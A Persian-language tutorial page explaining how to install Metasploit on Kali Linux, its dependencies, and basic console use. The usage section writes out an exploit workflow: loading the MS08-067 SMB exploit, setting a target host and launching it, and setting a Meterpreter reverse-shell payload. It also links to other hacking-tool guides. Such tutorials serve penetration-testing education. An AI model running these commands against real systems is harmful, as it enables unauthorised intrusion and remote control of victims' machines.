برای پیگیری آخرین آموزش های منتشر شده، کد های تخفیف و اخبار تکنولوژی، کانال تلگرام ما را دنبال کنید.

ویژگی تصویر

آموزش ابزار metasploit

  /  هک و امنیت   /  ابزار metasploit
بنر تبلیغاتی الف
هک - امنیت - هکر - کالی لینوکس - hack - ceh
...

ابزار metasploit

نوشته شده توسط متین برونسی
دسته بندی ها:
هک و امنیت

در این بخش به بررسی ابزار metasploit می پردازیم، Metasploit Framework یک ابزار قدرتمند و جامع برای آزمایش نفوذ است که به متخصصان امنیت اطلاعات کمک می‌کند تا آسیب‌پذیری‌های سیستم‌های شبکه را شناسایی و بررسی کنند. این ابزار که در ابتدا توسط H.D. Moore توسعه یافته است، اکنون به عنوان بخشی از پروژه‌های Open Source تحت نظارت Rapid7 قرار دارد. Metasploit به دلیل امکانات گسترده، ماژول‌های متعدد و توانایی خود در اتوماسیون بسیاری از فرآیندهای نفوذ، به یکی از ابزارهای محبوب و مورد استفاده در بین هکرها و محققان امنیتی تبدیل شده است.

کالی لینوکس، به عنوان یک توزیع تخصصی برای تست نفوذ و امنیت اطلاعات، شامل ابزارهای متعددی از جمله Metasploit است. در این مقاله، به نحوه نصب، پیش‌نیازها و استفاده از Metasploit در کالی لینوکس خواهیم پرداخت. هدف از این مقاله، ارائه یک راهنمای جامع و دقیق است که کاربران بتوانند با استفاده از آن، به راحتی Metasploit را نصب و از آن استفاده کنند.

نحوه نصب ابزار metasploit

1. نصب از مخازن کالی لینوکس

Metasploit به صورت پیش‌فرض در مخازن کالی لینوکس موجود است و می‌توان آن را به راحتی با استفاده از دستور apt نصب کرد. برای نصب Metasploit از طریق مخازن، مراحل زیر را دنبال کنید:

sudo apt update
sudo apt install metasploit-framework

این دستورات مخازن کالی لینوکس را به‌روز کرده و سپس Metasploit را نصب می‌کند. پس از اتمام نصب، می‌توانید با اجرای دستور msfconsole وارد محیط متاسپلویت شوید.

2. نصب از طریق گیت‌هاب

اگر می‌خواهید از آخرین نسخه Metasploit استفاده کنید، می‌توانید آن را از طریق گیت‌هاب نصب کنید. برای این کار، ابتدا نیاز به نصب Git دارید:

sudo apt install git

سپس مخزن Metasploit را کلون کنید:

git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework

پس از کلون کردن مخزن، می‌توانید با استفاده از دستور زیر متاسپلویت را نصب کنید:

sudo ./msfupdate

پیش نیازها (Dependencies)

برای استفاده از Metasploit، نیاز به برخی پیش‌نیازها و کتابخانه‌ها دارید که باید نصب شوند. این پیش‌نیازها عبارتند از:

1. Ruby

Metasploit به زبان Ruby نوشته شده است و بنابراین نیاز به نصب Ruby دارد. برای نصب Ruby، از دستور زیر استفاده کنید:

sudo apt install ruby-full
2. کتابخانه‌های وابسته

برخی کتابخانه‌های وابسته نیز برای عملکرد صحیح Metasploit مورد نیاز هستند. می‌توانید این کتابخانه‌ها را با استفاده از دستور زیر نصب کنید:

sudo apt install build-essential libssl-dev libpq5 libpq-dev libreadline-dev libsqlite3-dev libpcap-dev
3. دیتابیس PostgreSQL

Metasploit از دیتابیس PostgreSQL برای ذخیره داده‌ها و نتایج اسکن استفاده می‌کند. برای نصب PostgreSQL، از دستور زیر استفاده کنید:

sudo apt install postgresql postgresql-contrib

پس از نصب، سرویس PostgreSQL را راه‌اندازی کنید:

sudo service postgresql start

نحوه استفاده از ابزار metasploit

1. راه‌اندازی Metasploit

برای شروع کار با Metasploit، دستور msfconsole را اجرا کنید. این دستور محیط کنسول متاسپلویت را باز می‌کند که در آن می‌توانید دستورات مختلف را اجرا کنید.

msfconsole

2. انتخاب و بارگذاری یک اکسپلویت

برای انتخاب و بارگذاری یک اکسپلویت، از دستور use استفاده کنید. به عنوان مثال، برای بارگذاری اکسپلویت مربوط به آسیب‌پذیری SMB:

use exploit/windows/smb/ms08_067_netapi

3. تنظیم پارامترهای اکسپلویت

پس از بارگذاری اکسپلویت، باید پارامترهای مختلف آن را تنظیم کنید. به عنوان مثال، برای تنظیم آدرس IP هدف:

set RHOST 192.168.1.10

4. اجرا کردن اکسپلویت

پس از تنظیم پارامترها، می‌توانید اکسپلویت را با دستور run یا exploit اجرا کنید:

run

يا

exploit

5. استفاده از payload

Metasploit شامل ماژول‌های متعددی از جمله payloadها است. پس از اجرای موفق اکسپلویت، می‌توانید از payload مورد نظر خود استفاده کنید. به عنوان مثال، برای استفاده از یک reverse shell:

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444

Metasploit یکی از قدرتمندترین و جامع‌ترین ابزارهای تست نفوذ و امنیت اطلاعات است که به متخصصان این حوزه کمک می‌کند تا آسیب‌پذیری‌های سیستم‌ها را شناسایی و بررسی کنند. با داشتن یک محیط قدرتمند و ماژول‌های متعدد، Metasploit به یکی از ابزارهای ضروری برای هر محقق امنیتی تبدیل شده است. امیدواریم که این راهنما به شما کمک کند تا به راحتی Metasploit را نصب و از آن استفاده کنید و بتوانید به بهترین نحو از امکانات این ابزار بهره‌مند شوید. برای اطلاعات بیشتر و آموزش‌های پیشرفته‌تر، می‌توانید به منابع رسمی و مستندات Metasploit مراجعه کنید.

آیا این مطلب برای شما مفید بود ؟

خیر
بله

مخزن اکسپلویت:
Discourse 3.2.x - Anonymous Cache Poisoning
WebApps Python 2025-07-08
freeSSHd 1.0.9 - Denial of Service (DoS)
Remote Perl 2025-06-26

  • بازی هکری دکتر فصل سوم را تجربه کنید: معماهای جذاب، چالش‌های هوشمند و داستان مهیج؛ با توضیحات ساده و راهنمایی‌های کاربردی، همین حالا رمزها را بیابید؛ کلیک کنید...

  • در این بخش به بررسی ابزار crunch می پردازیم، Crunch یک ابزار قدرتمند برای تولید لیست‌های واژه‌نامه‌ای بر اساس الگوهای مشخص استفاده می‌شود...

  • ابزار pth-curl را بشناسید؛ استفاده از هش‌های NTLM برای تست نفوذ و ارزیابی امنیت سیستم‌ها با راهنمای گام‌به‌گام و نکات کاربردی....

  • در راهکارهای مقابله با حملات SQL Injection، بهترین روش‌ها و ابزارهای عملی را بشناسید و امنیت برنامه‌های وب خود را سریع و موثر تقویت کنید....

  • در این بخش به بررسی ابزار hping3 می پردازیم، hping3 یک ابزار برای اسکن پورت، تجزیه و تحلیل ترافیک شبکه، و انواع فعالیت‌های مرتبط با شبکه می باشد...

  • ابزار RSMANGLER یک ابزار قدرتمند برای تولید و تست رمزهای عبور است که به طور خاص بر روی سیستم عامل کالی لینوکس قابل استفاده است...

  • در این پست با ابزار patator آشنا شوید؛ یکی از قدرتمندترین ابزارهای کالی لینوکس برای حملات brute-force و تست نفوذ. راهنمای ساده استفاده و نکات امنیتی....

  • در این بخش به بررسی آسیب پذیری RFU می پردازیم، باگ RFU به مهاجمان امکان می‌دهد فایل‌های مخرب را بر روی سرور آپلود کنند...

  • باگ XXE یکی از آسیب‌پذیری‌های شناخته‌شده در تحلیل XML است که می‌تواند به مهاجمان اجازه دهد تا به سیستم‌عامل دسترسی پیدا کنند...

  • در این بخش به بررسی ابزار hfind می پردازیم، ابزار hfind برای ایجاد و جستجوی جداول هش (hash tables) در فایل‌های باینری استفاده می‌شود...